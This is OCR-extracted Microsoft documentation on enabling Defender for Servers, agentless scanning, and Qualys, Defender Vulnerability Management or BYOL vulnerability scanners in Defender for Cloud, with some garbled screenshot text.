[Preview]: Configure virtual machines to create the default 
Microsoft Defender for Cloud pipeline using Azure Monitor Agent 


[Preview]: Configure Arc machines to create the Microsoft 
Defender for Cloud user-defined pipeline using Azure Monitor 
Agent 


[Preview]: Configure machines to create the Microsoft Defender for 
Cloud user-defined pipeline using Azure Monitor Agent 


Configure machines to receive a vulnerability assessment provider 


Overview and prerequisites 


To review policy definitions, in the Azure portal, go to Policy > Definitions. 


Next steps 


Begin a deployment for your scenario: 


e Enable a Defender for Servers plan 


e Connect an on-premises machine to Azure 


e Connect an AWS account to Defender for Cloud 


e Connect a GCP project to Defender for Cloud 


Protect your servers with Defender for 
Servers 
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Defender for Servers in Microsoft Defender for Cloud brings threat detection and 
advanced defenses to your Windows and Linux machines that run in Azure, Amazon 
Web Services (AWS), Google Cloud Platform (GCP), and on-premises environments. This 
plan includes the integrated license for Microsoft Defender for Endpoint, security 
baselines and OS level assessments, vulnerability assessment scanning, adaptive 
application controls (AAC), file integrity monitoring (FIM), and more. 


Microsoft Defender for Servers includes an automatic, native integration with Microsoft 
Defender for Endpoint. Learn more, Protect your endpoints with Defender for Cloud's 
integrated EDR solution: Microsoft Defender for Endpoint. With this integration enabled, 
you have access to the vulnerability findings from Microsoft threat and vulnerability 


management. 


Defender for Servers offers two plan options with different levels of protection and their 
own cost. You can learn more about Defender for Cloud's pricing on the pricing page”. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 


you can sign up for a free subscription”. 
e You must enable Microsoft Defender for Cloud on your Azure subscription. 


e Review the Defender for Servers deployment guide. 


Enable the Defender for Servers plan 


You can enable the Defender for Servers plan from the Environment settings page to 
protect all the machines in an Azure subscription, AWS account, or GCP project. 


To enable the Defender for Servers plan: 
1. Sign in to the Azure portal £. 
2. Search for and select Microsoft Defender for Cloud. 


3. In the Defender for Cloud menu, select Environment settings. 


4. Select the relevant subscription. 


5. On the Defender plans page, toggle the Servers switch to On. 


B ws 3 1 Azure API Management services Con 


you select Save, Microsoft Defender for Cloud's e 


A atures will be enabled on all the resource types youve selected. The first 30 days are free. 
For more information on Defender for Cloud pricing, visit the 


Select a Defender for Servers plan 


When you enable the Defender for Servers plan, you're then given the option to select 
which plan - Plan 1 or Plan 2 - to enable. There are two plans you can choose from that 
offer different levels of protections for your resources. 


Review what's included each plan. 
To select a Defender for Servers plan: 
1. Sign in to the Azure portal Z. 
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant Azure subscription, AWS account, or GCP project. 


5. Select Change plans. 


Home > Microsoft Defender for Cloud | Environment settings 


e Settings | Defender plans 
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A Cloud Security Posture Management (CSPM) 


Microsoft Defender CSPM provides advanced security posture capabilities including agentless vulnerability scanning, the cloud security graph, ard advance threat hu 
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When you select Save, Microsoft Defender for Cloud's enhanced security features will be enabled on all the resource types you've selected. The first 20 days are free. 
For more information on Defender for Cloud pricing, visit the pricing page. 


6. In the popup window, select Plan 2 or Plan 1. 


ting. Pricing is based en suhseription size, with bling applying any for servers, Databases, and Storage resources ne pene 


Monitoring coverage 
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Plan selection x 


Defender for servers is offered in two plans. 

Plan 1 provides a limited set of defenses with a focus on Defender for Endpoint's 
protections. 

Plan 2 (formerly “Defender for servers") offers the full set of Defender for Cloud's 
enhanced security features. 

Learn more 


(©) Microsoft Defender for Servers Plan 2 /Server/Month 
^ Plan details “Recommended | 


© Agentless vulnerability scanning 

© Microsoft Defender for Endpoint 

© Microsoft Defender vulnerability management 

© Automatic agent onboarding, alert and data integration 
© Just-in-time VM access for management ports 

© Network layer threat detection 

© Adaptive application controls 

@ File integrity monitoring 

© Adaptive network hardening 

@ Integrated vulnerability assessment powered by Qualys 


© Log Analytics 500MB free data ingestion 


O Microsoft Defender for Servers Plan 1 /Server/Month 


Plan details 


7. Select Confirm. 


8. Select Save. 


Configure monitoring coverage 


There are three components that can be enabled and configured to provide extra 
protections to your environments in the Defender for Servers plans. 


Component Description Learn more 


Log Analytics Collects security-related configurations and Learn more about the 
agent/Azure event logs from the machine and stores the data Log Analytics agent. 
Monitor agent in your Log Analytics workspace for analysis. 

Vulnerability Enables vulnerability assessment on your Azure Learn more about how 
assessment for and hybrid machines. Defender for Cloud 
machines collects data. 

Agentless scanning Scans your machines for installed software and Learn more about 
for machines vulnerabilities without relying on agents or agentless scanning for 
impacting machine performance. machines. 


Toggle the corresponding switch to On, to enable any of these options. 


Configure Log Analytics agent/Azure Monitor agent 


After enabling the Log Analytics agent/Azure Monitor agent, you'll be presented with 
the option to select either the Log Analytics agent or the Azure Monitor agent and 
which workspace should be utilized. 


To configure the Log Analytics agent/Azure Monitor agent: 


1. Select Edit configuration. 


arch resources, services, and docs (G+/) 
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‘Vulnerability assessment for machines Enables vulnerability assessment on your Azure and hybrid machines. Learn more 


‘Agentless scanning for machines (preview) ‘Scans your machines for installed software and vulnerabilities without relying on agents or impacting machine performance. Learn more 


2. In the Auto provisioning configuration window, select one of the following two 
agent types: 


e Log Analytic Agent (Default) - Collects security-related configurations and 
event logs from the machine and stores the data in your Log Analytics 
workspace for analysis. 


e Azure Monitor Agent (Preview) - Collects security-related configurations and 
event logs from the machine and stores the data in your Log Analytics 
workspace for analysis. 


Auto-provisioning configuration x 


Log analytics agent 


Agent type 


@) Log Analytics Agent (Default) 
Collects security-related configurations and event logs from the machine and stores 
the data in your Log Analytics workspace for analysis 


O Azure Monitor Agent (Preview) 
Collects security-related configurations and event logs from the machine and stores 
the data in your Log Analytics workspace for analysis 

Workspace selection * © 


O Default workspace(s) 


(@) Custom workspace Select a workspace V 


(i) When selecting a custom workspace, make sure the relevant solutions are enabled on it. 
Learn more > 


Security events storage ê © 


| All Events 


OO If a VM already has either SCOM or OMS agent installed locally, the Log Analytics agent extension 
will still be installed and connected to the configured workspace. 
Any other solutions enabled on the selected workspace will be applied to Azure VMs that are 
connected to it. For paid solutions, this could result in additional charges. 
For data privacy considerations, please make sure your selected workspace is in your desired 
region. 


Apply 


3. Select either a Default workspace(s) or a Custom workspace depending on your 
need. 


4. Select Apply. 


Configure vulnerability assessment for machines 


Vulnerability assessment for machines allows you to select between two vulnerability 
assessment solutions: 


e Microsoft Defender vulnerability management 
e Microsoft Defender for Cloud integrated Qualys scanner 


To select either of the vulnerability assessment solutions: 


1. Select Edit configuration. 


P Search resources, services, and docs (G+/) 


When you enable an extension, it will be installed on any new or existing resource, by assigning a security policy. 


Component Description een decile Status 
ing ss sana: eda ah cu cin pig i a a a ii pla nin narra an am, as 
ab-la-7pkáqf2thjlps 
Vulnerabiity assessment for machines Enables vulnerability assessment on your Azure and hybrid machines, Leam more a crosoRt Defender vulnerabiliy management ED 
figuration A 
Agentless scanning for machines (preview) Scans your machines for installed software and vulnerabilities without relying on agents or impacting machine performance. Learn more ea Edit configuration eam) 


2. In the Extension deployment configuration window, select either of the solutions 
depending on your need. 


3. Select Apply. 


Configure agentless scanning for machines (preview) 


Defender for Cloud has the ability to scan your Azure machines for installed software 
and vulnerabilities without requiring you to install agents, have network connectivity or 
affect your machine's performance. 


To configure agentless scanning for machines: 


1. Select Edit configuration. 


Home 


19s | Defender plans 


Settings & monitoring 
Azure subscription 1 


x 
When you enable an extension, it wil be installed on any new or existing resource, by assigning a security policy. 
Defenders plans : Servers 
‘component Description Defender plans Configuration status 
Log Analytics agent/Azure Monitor agent phena configurations and event logs from the machine and stores the data in your Log Analytics workspace for analysis. eam AAO s on Te 
more ts 
lab-la-7pkaqhathlps 
‘Vulnerability assessment for machines Enables vulnerability assessment on your Azure and hybrid machines. Learn more = selec Microsoft Defender vulnerabilty management ean a) 
edit F 
Agentless scanning for machines (preview) Scans your machines for installed software and vulnerabilities without relying on agents or impacting machine performance. Learn more en 


2. Enter a tag name and tag value for any machines to be excluded from scans. 


3. Select Apply. 


Next steps 


Overview of Microsoft Defender for Servers 


Enable agentless scanning for VMs 
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Agentless scanning provides visibility into installed software and software vulnerabilities 
on your workloads to extend vulnerability assessment coverage to server workloads 
without a vulnerability assessment agent installed. 


Learn more about agentless scanning. 


Agentless vulnerability assessment uses the Microsoft Defender Vulnerability 
Management engine to assess vulnerabilities in the software installed on your VMs, 
without requiring Defender for Endpoint to be installed. Vulnerability assessment shows 
software inventory and vulnerability results in the same format as the agent-based 
assessments. 


Compatibility with agent-based vulnerability 
assessment solutions 


Defender for Cloud already supports different agent-based vulnerability scans, including 
Microsoft Defender Vulnerability Management (MDVM), BYOL and Qualys. Agentless 
scanning extends the visibility of Defender for Cloud to reach more devices. 


When you enable agentless vulnerability assessment: 


e If you have no existing integrated vulnerability assessment solutions enabled on 
any of your VMs on your subscription, Defender for Cloud automatically enables 
MDVM by default. 


e |f you select Microsoft Defender Vulnerability Management as part of an 
integration with Microsoft Defender for Endpoint, Defender for Cloud shows a 
unified and consolidated view that optimizes coverage and freshness. 

o Machines covered by just one of the sources (Defender Vulnerability 
Management or agentless) show the results from that source. 

o Machines covered by both sources show the agent-based results only for 
increased freshness. 


e |f you select Vulnerability assessment with Qualys or BYOL integrations - 
Defender for Cloud shows the agent-based results by default. Results from the 
agentless scan are shown for machines that don't have an agent installed or from 
machines that aren't reporting findings correctly. 


If you want to change the default behavior so that Defender for Cloud always 
displays results from MDVM (regardless of a third-party agent solution), select the 
Microsoft Defender Vulnerability Management setting in the vulnerability 


assessment solution. 


Enabling agentless scanning for machines 


When you enable Defender Cloud Security Posture Management (CSPM) or Defender 
for Servers P2, agentless scanning is enabled on by default. 


If you have Defender for Servers P2 already enabled and agentless scanning is turned 
off, you need to turn on agentless scanning manually. 


Agentless vulnerability assessment on Azure 
To enable agentless vulnerability assessment on Azure: 
1. From Defender for Cloud's menu, open Environment settings. 


2. Select the relevant subscription. 


3. For either the Defender Cloud Security Posture Management (CSPM) or Defender 


for Servers P2 plan, select Settings. 


instances 
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The agentless scanning settings are shared by both Defender Cloud Security 
Posture Management (CSPM) or Defender for Servers P2. When you enable 
agentless scanning on either plan, the setting is enabled for both plans. 


4. In the settings pane, turn on Agentless scanning for machines. 


Home > Microsoft Defender [Defender pi 
Settings & monitoring x 
When you enable an extension it wäl be installed on any newe rn eg poi 
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5. Select Save. 


Agentless vulnerability assessment on AWS 
1. From Defender for Cloud's menu, open Environment settings. 
2. Select the relevant account. 


3. For either the Defender Cloud Security Posture Management (CSPM) or Defender 
for Servers P2 plan, select Settings. 


A. Search resources, services, and docs (G+/) 
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When you enable agentless scanning on either plan, the setting applies to both 
plans. 


4. In the settings pane, turn on Agentless scanning for machines. 


Auto-provisioning configuration x 


To prevent, detect, and respond to threats, Microsoft Defender for Cloud collects security 
data and events from your machines. Learn more 


v Agentless scanning (preview) 


Scan your EC2 instances for installed software and vulnerabilities without requiring 
agents, network connectivity or impacting machine performance. Results are 
powered by Microsoft Defender Vulnerability Management engine. Learn more 


Azure Arc agent EO On 


Connects your servers to the Azure platform. When you enable the Arc agent, it'll be 
installed on new and existing instances with Systems Manager (SSM) agent enabled. 


i] Note: Arc auto-provisioning registers your account to the Azure resource providers 
“Microsoft.HybridCompute” and "Microsoft.GuestConfiguration”. 


V Additional extensions for Arc connected machines Á 2/3 enabled 
(preview) 


The selected extensions will be automatically provisioned on machines connected 


ta Noreen New 


d 


5. Select Save and Next: Configure Access. 
6. Download the CloudFormation template. 


7. Using the downloaded CloudFormation template, create the stack in AWS as 
instructed on screen. If you're onboarding a management account, you need to 
run the CloudFormation template both as Stack and as StackSet. Connectors will 
be created for the member accounts up to 24 hours after the onboarding. 


8. Select Next: Review and generate. 
9. Select Update. 


After you enable agentless scanning, software inventory and vulnerability information 


are updated automatically in Defender for Cloud. 


Enable agentless scanning in GCP 


1. From Defender for Cloud's menu, select Environment settings. 


2. Select the relevant project or organization. 


3. For either the Defender Cloud Security Posture Management (CSPM) or Defender 


for Servers P2 plan, select Settings. 


Home > Microsof Detender for Goud | (evronment settings 


1) Settings | Defender plans 


Gan pak © Select plans 
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4. In the settings pane, turn on Agentless scanning. 


Auto-provisioning configuration x 


To prevent, detect, and respond to threats, Microsoft Defender for Cloud collects security data 
and events from your machines. Learn more 


v Agentless scanning 


Scan your GCP VM instances for installed software and vulnerabilities without 
requiring agents, network connectivity or impacting machine performance. Results are a 
powered by Microsoft Defender Vulnerability Management engine. Learn more 

5. Select Save and Next: Configure Access. 


6. Copy the onboarding script. 


7. Run the onboarding script in the GCP organization/project scope (GCP portal or 
gcloud CLI). 


8. Select Next: Review and generate. 


9. Select Update. 


Exclude machines from scanning 


Agentless scanning applies to all of the eligible machines in the subscription. To prevent 
specific machines from being scanned, you can exclude machines from agentless 
scanning based on your pre-existing environment tags. When Defender for Cloud 
performs the continuous discovery for machines, excluded machines are skipped. 


To configure machines for exclusion: 
1. From Defender for Cloud's menu, open Environment settings. 
2. Select the relevant subscription or multicloud connector. 


3. For either the Defender Cloud Security Posture Management (CSPM) or Defender 
for Servers P2 plan, select Settings. 


4. For agentless scanning, select Edit configuration. 


Agentless scanning for machines (preview) Scans your machines for installed software and vulnerabilieties without relying on agents D EA 
or impacting machine performance. Learn more 


5. Enter the tag name and value that applies to the machines that you want to 
exempt. You can enter multiple tag:value pairs. 


Agentless scanning configuration x 


Agentless scanning for Azure machines (preview) 


Defender for Cloud scans your Azure machines for installed software and 
vulnerabilieties without requiring agents, network connectivity or impacting machine 
performance. Results are powered by Microsoft Defender Vulnerability Management 
engine. Learn more 


Name © Value © 


6. Select Save to apply the changes. 


Next steps 


In this article, you learned about how to scan your machines for software vulnerabilities 
without installing an agent. 


Learn more about: 


e Vulnerability assessment with Microsoft Defender for Endpoint 


e Vulnerability assessment with Qualys 
e Vulnerability assessment with BYOL solutions 


Enable vulnerability scanning with 
Microsoft Defender Vulnerability 
Management 
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Microsoft Defender Vulnerability Management is included with Microsoft Defender for 


Servers and uses built-in and agentless scanners to: 


e Discover vulnerabilities and misconfigurations in near real time 
e Prioritize vulnerabilities based on the threat landscape and detections in your 
organization 


To learn more about agentless scanning, see Find vulnerabilities and collect software 
inventory with agentless scanning 


O Note 


Microsoft Defender Vulnerability Management Add-on capabilities are included in 
Defender for Servers Plan 2. This provides consolidated inventories, new 
assessments, and mitigation tools to further enhance your vulnerability 
management program. To learn more, see Vulnerability Management capabilities 


for servers. 


Defender Vulnerability Management add-on capabilities are only available through 
the Microsoft Defender 365 portal z. 


If you've enabled the integration with Microsoft Defender for Endpoint, you 
automatically get the Defender Vulnerability Management findings without the need for 
more agents. 


Microsoft Defender Vulnerability Management continuously monitors your organization 
for vulnerabilities and periodic scans aren't required. 


For a quick overview of Defender Vulnerability Management, watch this video: 
https://www.microsoft.com/en-us/videoplayer/embed/RE4Y 1FX?postJsIIMsg=true Z 
Tip 


As well as alerting you to vulnerabilities, Defender Vulnerability Management also 
provides functionality for Defender for Cloud's asset inventory tool. Learn more in 


Software inventory. 


You can learn more by watching this video from the Defender for Cloud in the Field 
video series: 


e Microsoft Defender for Servers 


Availability 


Aspect Details 
Release state: General availability (GA) 
Machine types: Lv] Azure virtual machines 


Azure Arc-enabled machines 
Supported machines 


Pricing: Requires Microsoft Defender for Servers Plan 1 or Plan 2 
Prerequisites: Enable the integration with Microsoft Defender for Endpoint 


Required roles and permissions: | Owner (resource group level) can deploy the scanner 
Security Reader can view findings 


Clouds: © Commercial clouds 
X National (Azure Government, Azure China 21Vianet) 


Onboarding your machines to Defender 
Vulnerability Management 


The integration between Microsoft Defender for Endpoint and Microsoft Defender for 
Cloud takes place in the background, so it doesn't involve any changes at the endpoint 


level. 


e To manually onboard one or more machines to Defender Vulnerability 
Management, use the security recommendation "Machines should have a 


vulnerability assessment solution £ ": 


Home > Microsoft Defender for Cloud | Recommendations > Machines should have a vulnerability assessment solution 


A vulnerability assessment solution should be enabled on your virtual machines 


Fixing yotams-ubuntu 


Choose a vulnerability assessment solution: 


@ Microsoft Defender vulnerability management (included with Microsoft Defender for servers) 
O Deploy the integrated vulnerability scanner powered by Qualys (included with Microsoft Defender for servers) 
O Deploy your configured third-party vulnerability scanner (BYOL - requires a separate license) 


© Configure a new third-party vulnerability scanner (BYOL - requires a separate license) 


e To automatically find and view the vulnerabilities on existing and new machines 
without the need to manually remediate the preceding recommendation, see 
Automatically configure vulnerability assessment for your machines. 


e To onboard via the REST API, run PUT/DELETE using this URL: 
https://management.azure.com/subscriptions/.../resourceGroups/.../providers/Mi 
crosoft.Compute/virtualMachines/.../providers/Microsoft.Security/serverVulnera 


bilityAssessments/mdetvm?api-version=2015-06-01-preview 


The findings for all vulnerability assessment tools are in the Defender for Cloud 
recommendation Vulnerabilities in your virtual machines should be remediated. Learn 
about how to view and remediate findings from vulnerability assessment solutions on 
your VMs 


Learn more 


You can check out the following blogs: 


e Security posture management and server protection for AWS and GCP are now 
generally available Z 
e Microsoft Defender for Cloud Server Monitoring Dashboard £ 


Next steps 


Remediate the findings from your vulnerability assessment solution 


Defender for Cloud also offers vulnerability analysis for your: 


e SQL databases - Explore vulnerability assessment reports in the vulnerability 
assessment dashboard 


e Azure Container Registry images - Use Microsoft Defender for container registries 
to scan your images for vulnerabilities 
e Amazon AWS Elastic Container Registry images - Use Microsoft Defender for 


container registries to scan your images for vulnerabilities 


Enable vulnerability scanning with the 
integrated Qualys scanner 
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A core component of every cyber risk and security program is the identification and 
analysis of vulnerabilities. Defender for Cloud regularly checks your connected machines 
to ensure they're running vulnerability assessment tools. 


When a machine is found that doesn't have a vulnerability assessment solution 
deployed, Defender for Cloud generates the security recommendation: Machines 
should have a vulnerability assessment solution. Use this recommendation to deploy 
the vulnerability assessment solution to your Azure virtual machines and your Azure 
Arc-enabled hybrid machines. 


Defender for Cloud includes vulnerability scanning for your machines. You don't need a 
Qualys license or even a Qualys account - everything's handled seamlessly inside 
Defender for Cloud. This page provides details of this scanner and instructions for how 
to deploy it. 


@ Tip 


The integrated vulnerability assessment solution supports both Azure virtual 
machines and hybrid machines. To deploy the vulnerability assessment scanner to 
your on-premises and multicloud machines, connect them to Azure first with Azure 
Arc as described in Connect your non-Azure machines to Defender for Cloud. 


Defender for Cloud's integrated vulnerability assessment solution works seamlessly 
with Azure Arc. When you've deployed Azure Arc, your machines will appear in 
Defender for Cloud and no Log Analytics agent is required. 


If you don't want to use the vulnerability assessment powered by Qualys, you can use 
Microsoft Defender Vulnerability Management or deploy a BYOL solution with your own 
Qualys license, Rapid7 license, or another vulnerability assessment solution. 


Availability 


Aspect Details 


Release state: General availability (GA) 


Aspect Details 


Machine types (hybrid scenarios): @ azure virtual machines 
@ azure Arc-enabled machines 


Pricing: Requires Microsoft Defender for Servers Plan 2 


Required roles and permissions: Owner (resource group level) can deploy the scanner 
Security Reader can view findings 


Clouds: OO Commercial clouds 
* National (Azure Government, Azure China 21Vianet) 
© Connected AWS accounts 


Overview of the integrated vulnerability 
scanner 


The vulnerability scanner included with Microsoft Defender for Cloud is powered by 
Qualys. Qualys' scanner is one of the leading tools for real-time identification of 
vulnerabilities. It's only available with Microsoft Defender for Servers. You don't need a 
Qualys license or even a Qualys account - everything's handled seamlessly inside 
Defender for Cloud. 


How the integrated vulnerability scanner works 


The vulnerability scanner extension works as follows: 


1. Deploy - Microsoft Defender for Cloud monitors your machines and provides 
recommendations to deploy the Qualys extension on your selected machine/s. 


2. Gather information - The extension collects artifacts and sends them for analysis 
in the Qualys cloud service in the defined region. 


3. Analyze - Qualys' cloud service conducts the vulnerability assessment and sends its 
findings to Defender for Cloud. 
@ Important 


To ensure the privacy, confidentiality, and security of our customers, we don't 
share customer details with Qualys. Learn more about the privacy standards 
built into Azure”. 


4. Report - The findings are available in Defender for Cloud. 


| PE € ` Microsoft Defender for Cloud 
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Deploy the integrated scanner to your Azure 
and hybrid machines 


1. From the Azure portal Z, open Defender for Cloud. 
2. From Defender for Cloud's menu, open the Recommendations page. 


3. Select the recommendation Machines should have a vulnerability assessment 
solution. 


JD 
x 


A vulnerability assessment solution should be enabled & 


on your virtual machines 


Severity Freshness interval 


GKE ® 24 Hours 


wv Description 
w Remediation steps 


^ Affected resources 


Unhealthy resources (70) Healthy resources (6) Not applicable resources (21) 


| Ø Search VMs & servers | 


| Name TL) Subscription 
O HZ paita Contoso 
B HZ paita Contoso 
O HO partai Contoso 
JU B HR Contoso 
A 
Ọ Tip 


The machine server16-test, is an Azure Arc-enabled machine. To deploy the 
vulnerability assessment scanner to your on-premises and multicloud 
machines, see Connect your non-Azure machines to Defender for Cloud. 


Defender for Cloud works seamlessly with Azure Arc. When you've deployed 
Azure Arc, your machines will appear in Defender for Cloud and no Log 


Analytics agent is required. 


Your machines appear in one or more of the following groups: 


e Healthy resources — Defender for Cloud has detected a vulnerability 
assessment solution running on these machines. 

e Unhealthy resources — A vulnerability scanner extension can be deployed to 
these machines. 

e Not applicable resources — these machines aren't supported for the 


vulnerability scanner extension. 


4. From the list of unhealthy machines, select the ones to receive a vulnerability 
assessment solution and select Remediate. 


@ Important 
Depending on your configuration, this list might appear differently. 


e If you haven't got a third-party vulnerability scanner configured, you 
won't be offered the opportunity to deploy it. 

e |f your selected machines aren't protected by Microsoft Defender for 
Servers, the Defender for Cloud integrated vulnerability scanner option 


won't be available. 


A Vulnerability assessment solution x 
should be enabled on your virtual machines 


Remediating 1 resource 


Choose a vulnerability assessment solution: 


@) Recommended: Deploy ASC integrated vulnerability scanner powered by Qualys 
(included in Microsoft Defender for servers) 


O Deploy your configured third-party vulnerability scanner 
(BYOL - requires a separate license) 


O Configure a new third-party vulnerability scanner 
(BYOL - requires a separate license) 


5. Choose the recommended option, Deploy integrated vulnerability scanner, and 
Proceed. 


6. You're asked for one further confirmation. Select Remediate. 


The scanner extension is installed on all of the selected machines within a few 
minutes. 


Scanning begins automatically as soon as the extension is successfully deployed. 
Scans run every 12 hours. This interval isn't configurable. 


© Important 


If the deployment fails on one or more machines, ensure the target machines 
can communicate with Qualys’ cloud service by adding the following IPs to 
your allowlists (via port 443 - the default for HTTPS): 


e https://qagpublic.qg3.apps.qualys.com - Qualys’ US data center 
e https://qagpublic.qg2.apps.qualys.eu - Qualys' European data center 


If your machine is in a region in an Azure European geography (such as 
Europe, UK, Germany), its artifacts will be processed in Qualys' European data 
center. Artifacts for virtual machines located elsewhere are sent to the US data 
center. 


Automate at-scale deployments 


O Note 


All of the tools described in this section are available from Defender for Cloud's 
GitHub community repository“. There, you can find scripts, automations, and 
other useful resources to use throughout your Defender for Cloud deployment. 


Some of these tools only affect new machines connected after you enable at scale 
deployment. Others also deploy to existing machines. You can combine multiple 
approaches. 


Some of the ways you can automate deployment at scale of the integrated scanner: 


e Azure Resource Manager — This method is available from view recommendation 
logic in the Azure portal. The remediation script includes the relevant ARM 


template you can use for your automation: 


degiak 2. Magee EENE tof Sed Automatic remediation script content x 
A vulnerability assessment solution should 
1 É 
Severity Freshness interval : EE a 
Ge © 24 Hours å "template": { j 
5 “contentVersion”: "1.0.0.0" 
6 “$schema":| "https: //schema.management .azure.com/schemas/2015-@1-01/deploymentTemplate. j: 
7 “parameters”: 
“vmName": { 
^ Description 9 "type": “string” 
Deploy an extension to your virtual machines to enable a vulnerability assessment z NOE E ed 
12 "type": “string” 
^ Remediation steps 13 } 
Quick fix remediation: e EEE I 
To remediate with a single click, in the Unhealthy resources tab (below), select the ae { A 
Read the remediation details in the confirmation box, insert the relevant paramete 17 "type": "resourceType/providers/serverVulnerabilityAssessments", 
18 “name": "[concat(parameters('vmName'), */Microsoft.Security/default')]", 
Note: It can take several minutes after remediation completes to see the resource: 19 “apiversion": “[parameters(‘apiVersionByEnv’ II 
20 } 
| View remediation logic ] 21 ] 
22 b 
anual remediation: 23 “parameters”: { 
To deploy a vulnerability assessment solution on your virtual machines: 24 “vmName": { 
25 “value": "resourceName" 
© Select one or more VMs from the list below and select "Remediate". Note: 26 b 
© On the "Choose a vulnerability assessment solution" page, you can choos 27 "apiVersionByEnv": { 
© Note that your virtual machines must be running in order to deplo 28 "value": "2@15-@6-@1-preview” 
29 } 
30 } Q 
v Affected resources 31 } 
322 i l. 


e DeploylfNotExists policy A custom policy” for ensuring all newly created 
machines receive the scanner. Select Deploy to Azure and set the relevant 
parameters. You can assign this policy at the level of resource groups, 
subscriptions, or management groups. 

e PowerShell Script — Use the Update qualys-remediate-unhealthy-vms.ps1 script to 
deploy the extension for all unhealthy virtual machines. To install on new resources, 
automate the script with Azure Automation. The script finds all unhealthy machines 
discovered by the recommendation and executes an Azure Resource Manager call. 

e Azure Logic Apps - Build a logic app based on the sample app Z . Use Defender 
for Cloud's workflow automation tools to trigger your logic app to deploy the 
scanner whenever the Machines should have a vulnerability assessment solution 
recommendation is generated for a resource. 

e REST API — To deploy the integrated vulnerability assessment solution using the 
Defender for Cloud REST API, make a PUT request for the following URL and add 
the relevant resource ID: 


https://management.azure.com/<resourceld>/providers/Microsoft.Security/serverV 


ulnerabilityAssessments/default?api-Version=2015-06-01-preview 


Trigger an on-demand scan 


You can trigger an on-demand scan from the machine itself, using locally or remotely 
executed scripts or Group Policy Object (GPO). Alternatively, you can integrate it into 
your software distribution tools at the end of a patch deployment job. 


The following commands trigger an on-demand scan: 


e Windows machines: REG ADD 


HKLM\SOF TWARE \Qualys\QualysAgent\ScanOnDemand\Vulnerability /v "ScanOnDemand" 
/t REG DWORD /d "1" /f 


e Linux machines: sudo /usr/local/qualys/cloud-agent/bin/cloudagentctl.sh 


action=demand type=vm 


Next steps 


Remediate the findings from your vulnerability assessment solution 


Defender for Cloud also offers vulnerability analysis for your: 


e SQL databases - Explore vulnerability assessment reports in the vulnerability 
assessment dashboard 

e Azure Container Registry images - Use Defender for Containers to scan your ACR 
images for vulnerabilities 


Enable vulnerability scanning with a 
Bring Your Own License (BYOL) solution 


Article e 06/29/2023 


If you've enabled Microsoft Defender for Servers, you're able to use Microsoft 
Defender for Cloud's built-in vulnerability assessment tool as described in Integrated 
Qualys vulnerability scanner for virtual machines. This tool is integrated into Defender 
for Cloud and doesn't require any external licenses - everything's handled seamlessly 
inside Defender for Cloud. In addition, the integrated scanner supports Azure Arc- 


enabled machines. 


Alternatively, you might want to deploy your own privately licensed vulnerability 
assessment solution from Qualys £ or Rapid7 Z . You can install one of these partner 
solutions on multiple VMs belonging to the same subscription (but not to Azure Arc- 


enabled machines). 


Availability 


Aspect Details 
Release state: General availability (GA) 
Machine types: © Azure virtual machines 


* Azure Arc-enabled machines 
Pricing: Free 


Required roles and permissions: Resource owner can deploy the scanner 
Security reader can view findings 


Clouds: © Commercial clouds 
* National (Azure Government, Azure China 21Vianet) 


Deploy a BYOL solution from the Azure portal 


The BYOL options refer to supported third-party vulnerability assessment solutions. 
Currently both Qualys and Rapid7 are supported providers. 


Supported solutions report vulnerability data to the partner's management platform. In 
turn, that platform provides vulnerability and health monitoring data back to Defender 
for Cloud. You can identify vulnerable VMs on the workload protection dashboard and 


switch to the partner management console, directly from Defender for Cloud for reports 


and more information. 
1. From the Azure portal Z, open Defender for Cloud. 
2. From Defender for Cloud's menu, open the Recommendations page. 


3. Select the recommendation Machines should have a vulnerability assessment 


solution. 


A vulnerability assessment solution should be enabled & x 


on your virtual machines 


Severity Freshness interval 


| Medium ® 24 Hours 


v Description 
wv Remediation steps 


^ Affected resources 


Unhealthy resources (70) Healthy resources (6) Not applicable resources (21) 


| O Search VMs & servers 


| Name TL Subscription 
EE HZ paita Contoso 
o HZ paita Contoso 
O A petite Contoso 
O B serverss-test Contoso 


a) 


Your VMs appear in one or more of the following groups: 


e Healthy resources — Defender for Cloud has detected a vulnerability 
assessment solution running on these VMs. 

e Unhealthy resources — A vulnerability scanner extension can be deployed to 
these VMs. 

e Not applicable resources — these VMs can't have a vulnerability scanner 
extension deployed. 


4. From the list of unhealthy machines, select the ones to receive a vulnerability 
assessment solution and select Remediate. 


@ Important 
Depending on your configuration, you might only see a subset of this list. 


e If you haven't got a third-party vulnerability scanner configured, you 
won't be offered the opportunity to deploy it. 

e |f your selected VMs aren't protected by Microsoft Defender for Servers, 
the Defender for Cloud integrated vulnerability scanner option will be 


unavailable. 


Home > Microsoft Defender for Cloud | Recommendations > Machines should have a vulnerability assessment solution 


A vulnerability assessment solution should be enabled on your virtual machines 


Fixing yoafrvm 


Choose a vulnerability assessment solution: 


© Microsoft Defender vulnerability management (included with Microsoft Defender for servers) 

O Deploy the integrated vulnerability scanner powered by Qualys (included with Microsoft Defender for servers) 
O Deploy your configured third-party vulnerability scanner (BYOL - requires a separate license) 

O Configure a new third-party vulnerability scanner (BYOL - requires a separate license) 


5. If you're setting up a new BYOL configuration, select Configure a new third-party 
vulnerability scanner, select the relevant extension, select Proceed, and enter the 
details from the provider as follows: 

a. For Resource group, select Use existing. If you later delete this resource group, 
the BYOL solution won't be available. 

b. For Location, select where the solution is geographically located. 

c. For Qualys, enter the license provided by Qualys into the License code field. 

d. For Rapid7, upload the Rapid7 Configuration File. 

e. In the Public key box, enter the public key information provided by the partner. 

f. To automatically install this vulnerability assessment agent on all discovered 
VMs in the subscription of this solution, select Auto deploy. 

g. Select OK. 


6. If you have already set up your BYOL solution, select Deploy your configured 
third-party vulnerability scanner, select the relevant extension, and select 
Proceed. 


After the vulnerability assessment solution is installed on the target machines, Defender 
for Cloud runs a scan to detect and identify vulnerabilities in the system and application. 
It might take a couple of hours for the first scan to complete. After that, it runs hourly. 


Deploy a BYOL solution using PowerShell and 
the REST API 


To programmatically deploy your own privately licensed vulnerability assessment 
solution from Qualys“ or Rapid7 Z, use the supplied script PowerShell > Vulnerability 
Solution Z. This script uses the REST API to create a new security solution in Defender 
for Cloud. You need a license and a key provided by your service provider (Qualys or 
Rapid7). 


@ Important 


Only one solution can be created per license. Attempting to create another solution 
using the same name/license/key will fail. 


Prerequisites 
Required PowerShell modules: 


e Install-module Az 
e Install-module Az.security 


Run the script 


